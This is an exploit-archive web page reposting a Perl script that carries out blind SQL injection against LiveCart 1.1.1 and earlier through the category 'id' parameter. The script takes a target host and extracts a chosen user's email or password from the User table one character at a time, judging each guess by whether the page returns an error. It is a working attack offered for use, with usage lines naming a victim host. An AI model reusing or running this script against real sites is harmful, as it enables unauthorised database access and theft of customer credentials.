首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit 来源：http://noscan.info/forum 作者：irvian 发布时间：2008-04-11   #!/usr/bin/perl -w use LWP::UserAgent; #-----------------------------------------------------------------------------------------------# # scripts       : livecart Remote Blind Sql Injection # # scripts site  : http://www.livecart.com # # # # Discovered # # By : irvian # # site : http://irvian.cn # # forum : http://noscan.info/forum # # email : irvian.info@gmail.com # # # # Thanks To # # friend : str0ke, nyubi, ibnusina, arioo, jipank, ifx, karet, bluespy and all my friend # #-----------------------------------------------------------------------------------------------# # sample : # # http://demo.livecart.com # #-----------------------------------------------------------------------------------------------# print "\r\n[+]----------------------[+]\r\n"; print "[+]Blind SQL injection [+]\r\n"; print "[+]Livecart              [+]\r\n"; print "[+]code by irvian [+]\r\n"; print "[+]irvian[dot]cn [+]\r\n"; print "[+]----------------------[+]\n\r"; if (@ARGV < 3){ die " Cara Mengunakan : perl $0 host option userid Keterangan host : http://victim.com atau victim.com Option : pilih 1 untuk mencari email dan pilih 2 untuk mencari password userid : Limit Contoh : perl $0 http://victim.com 1 1 \n";} $url = $ARGV[0]; $option = $ARGV[1]; $id = $ARGV[2]; if ($option eq 1){ syswrite(STDOUT, "email: ", 7);} elsif ($option eq 2){ syswrite(STDOUT, "password: ", 10);} for($i = 1; $i <= 32; $i++){ $f = 0; $n = 32; while(!$f && $n <= 57) {   if(&blind($url, $option, $id, $i, $n, $id)){   $f = 1;      syswrite(STDOUT, chr($n), 1);    } $n++; } if ($f==0){ $n = 97; while(!$f && $n <= 122) {   if(&blind($url, $option, $id, $i, $n, $id)){   $f = 1;      syswrite(STDOUT, chr($n), 1);    } $n++; } } } print "\n[+]finish Execution Exploit\n"; sub blind { my $site = $_[0]; my $op = $_[1]; my $id = $_[2]; my $i = $_[3]; my $n = $_[4]; my $r = $_[5]; if ($op eq 1){$klm = "email";} elsif ($op eq 2){$klm = "password";} $site =~ s/^http:\/\///; my $url = "http://"."$site"."/category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1"."),"."$i".",1)=CHAR("."$n".")"; my $browser = &zero($url); if ($browser !~ /Error Code 500/gi){ return 1; } else { return 0; } } sub zero($){ my $spy = $_[0]; my $ua = LWP::UserAgent->new; $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); my $res =  $ua->get($spy); my @r = $res->content; $page="@r"; return $page;}   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·KnowledgeQuest 2.5 Arbitrary A ·LightNEasy 1.2 (no database) R ·phpBB Add-on Fishing Cat Porta ·Borland InterBase 2007 ibserve ·Biz E-Banking Integrator V2 Ac ·1024 CMS <= 1.4.2 Local File I ·LokiCMS <= 0.3.3 Remote Comman ·XM Easy Personal FTP Server 5. ·FLABER <= 1.1 RC1 Remote Comma ·Mumbo Jumbo Media OP4 Remote B ·phpTournois <= G4 Remote File ·HP OpenView NNM v7.5.1 ovalarm   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved